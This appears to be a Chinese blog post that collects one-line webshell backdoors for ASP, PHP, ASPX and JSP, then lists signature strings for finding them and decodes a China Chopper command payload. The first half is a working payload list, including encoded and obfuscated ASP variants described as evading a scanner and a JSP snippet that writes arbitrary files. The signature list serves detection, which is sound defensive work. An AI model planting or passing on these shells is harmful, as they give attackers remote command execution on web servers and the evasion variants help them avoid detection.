一些常見的webshell後門的特徵碼

02-01

一些常見的webshell（asp,aspx,php,jsp等）後門木馬。

一句話木馬具體有以下這些，這些都是自己平時收集的。（當然收集不齊全，希望大家幫忙完善～）

============================

asp一句話木馬：

<%%25Execute(request("a"))%%25>

<%Execute(request("a"))%>

%><%execute request("a")%><%

<%25Execute(request("a"))%25>

%><%execute request("yy")%>

<%execute request(char(97))%>

<%eval request(char(97))%>

":execute request("value"):a="

ExecuteGlobal request(chr(35))

</script>

在資料庫里插入的一句話木馬

utf-7的馬

<%@ codepage=65000%>

<% response.Charset="936"%>

<%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

Script Encoder 加密

<%@ LANGUAGE = VBScript.Encode %>

<%#@~^PgAAAA==r6P. ;!+/D`14Dv&X#*@!@*ErPPD4+ P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb*oBMAAA==^#~@%>

可以躲過雷客圖的一句話。

set ms = server.CreateObject("MSScriptControl.ScriptControl.1")

ms.Language="VBScript"

ms.AddObject "Response", Response

ms.AddObject "request", request

ms.ExecuteStatement("ev"&"al(request(""1""))")

php一句話

<? php eval($_POST[cmd]);?>

<?php eval($_POST[cmd]);?>

<?php system($_REQUEST[cmd]);?>

<?php eval($_POST[1]);?>

aspx一句話

WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");

</script>

JSP一句話後門

if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());

================================我是邪惡的分界線==============================

下面整理了一些webshell後門的特徵碼（搜索的時候不要區分大小寫）：

asp木馬特徵：

aspshell

Execute(request

execute request(

eval request(

"ev"&"al(request(

ExecuteGlobal request

php木馬特徵：

base64

base64_decode

angle

<? php eval($_POST[cmd]);?>

<?php eval($_POST[

<?php system($_REQUEST[cmd]);?>

<?php system($_REQUEST[

jsp木馬特徵：

JFolder （我就只有這個。。。）

「菜刀」使用了base64的方式加密了發送給「菜刀馬」的指令，通過分析我們能夠觀察到其中的兩個關鍵payload z1和z2。

z1=Y21k& z2=Y2QgL2QgIkQ6XHd3d1xxaHJkd3dcIiZ3aG9hbWkmZWNobyBbU10mY2QmZWNobyBbRV0%3D n

通過解密加密的內容可以得到解密的payload

z1=cmd z2=cd /d 「D:wwwqhrdww」&whoami&echo [S]&cd&echo [E]7 n